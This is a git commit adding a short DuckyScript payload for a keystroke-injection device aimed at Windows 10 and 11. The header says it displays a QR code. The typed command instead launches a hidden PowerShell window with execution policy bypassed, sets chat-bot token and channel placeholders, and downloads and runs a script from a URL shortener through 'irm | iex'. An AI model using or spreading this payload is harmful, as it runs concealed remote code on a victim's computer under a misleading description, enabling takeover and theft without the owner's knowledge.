Add files via upload

This commit is contained in:
egieb
2024-03-27 19:55:02 +00:00
committed by GitHub
parent aa2faad06f
commit 30f77a3a7c
2 changed files with 89 additions and 0 deletions

View File

@@ -0,0 +1,15 @@
REM Title: beigeworm's QR code to console.
REM Author: @beigeworm
REM Description: Uses Powershell to display a generated QR code from text or a URL
REM Target: Windows 10 and 11
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex
ENTER